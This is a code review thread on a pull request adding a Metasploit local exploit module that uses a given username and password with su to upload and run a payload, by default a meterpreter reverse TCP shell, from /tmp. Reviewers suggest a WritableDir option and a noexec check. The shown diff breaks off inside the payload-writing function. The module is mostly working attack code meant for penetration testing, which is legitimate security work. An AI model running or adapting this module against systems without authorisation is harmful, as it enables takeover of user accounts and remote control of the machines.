modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+    include Msf::Post::File
+    include Msf::Post::Unix
+
+    Rank = NormalRanking
+
+    def initialize(info = {})
+        super(
+            update_info(info,
+                "Name"           => "Login to Another User with Su on Linux / Unix Systems",
+                "Description"    => "This module attempts to create a new login session by
+                                     invoking the su command of a valid username and password.
+
+                                     If the login is successful, a new session is created via
+                                     the specified payload.",
+                "License"        => MSF_LICENSE,
+                "Author"         => "Gavin Youker <youkergav@gmail.com>",
+                "DisclosureDate" => "Sep 10 2020",
+                "Platform"       => ["linux",  "unix"],
+                "Arch"           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+                'Targets'        => [['Automatic', {}]],
+                "DefaultTarget"  => 0,
+                "DefaultOptions" => { "PAYLOAD" => "linux/x86/meterpreter/reverse_tcp" },
+                "SessionTypes"   => ["shell", "meterpreter"]
+            )
+        )
+
+        register_options([
+            OptString.new("USERNAME", [true,"Username to authenticate with."]),
+            OptString.new("PASSWORD", [true, "Password to authenticate with."])
+        ])
+    end
+
+    # Main function to run the exploit.
+    def exploit()
+        fail_with(Failure::NoAccess, "username not found") if not user_exists(datastore["USERNAME"]) # Check if use exists
+
+        # Upload the payload and stager files.
+        print_status("Uploading payload to target")
+        payload_file = build_payload(payload.encoded_exe)
+
+        # Execute the payload.
+        print_status("Attempting to login with su")
+        result = exec_payload(datastore["USERNAME"], datastore["PASSWORD"], payload_file)
+        cleanup_files([payload_file]) if result
+    end
+
+    # Function to build and write the payload.
+    def build_payload(contents)
+        filepath = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
```

Comment:
In some cases `/tmp` will be mounted with `noexec` and all users will be unable to execute files located there. I think the writable execution directory should be an advanced option that defaults to `/tmp` and we should check the response for errors like the file was unable to be executed.

Reply:
There's a `noexec?` method to check if a directory is mounted `noexec`.

```
# grep -rni "def noexec" lib/msf/core/post/linux/system.rb  -A 10
259:  def noexec?(file_path)
260-    mount = cmd_exec('cat /proc/mounts').to_s
261-    mount_path = get_mount_path(file_path)
262-    mount.lines.each do |l|
263-      return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
264-    end
265-    false
266-  rescue
267-    raise 'Unable to check for noexec volume'
268-  end
269-
```

Reply:
Updated. Module now includes `PayloadFilepath` as an advanced option. 

Adding `noexec?` command returns `Exploit failed: NoMethodError undefined method `noexec?'`. Any ideas?

See commit 17483f838e9c33851be2595ff0e10480f6b908ca

Reply:
> Updated. Module now includes `PayloadFilepath` as an advanced option.

The traditional option is `WritableDir` defaulting to `/tmp`.

```ruby
    register_advanced_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
```

> Adding `noexec?` command returns `Exploit failed: NoMethodError undefined method `noexec?'`. Any ideas?

The `noexec?` method is defined in the `Msf::Post::Linux::System` mixin.

```ruby
include Msf::Post::Linux::System
```

Reply:
Fixed. See commit d45dfe865af82c07f0b2d5a9f989bf90d13824eb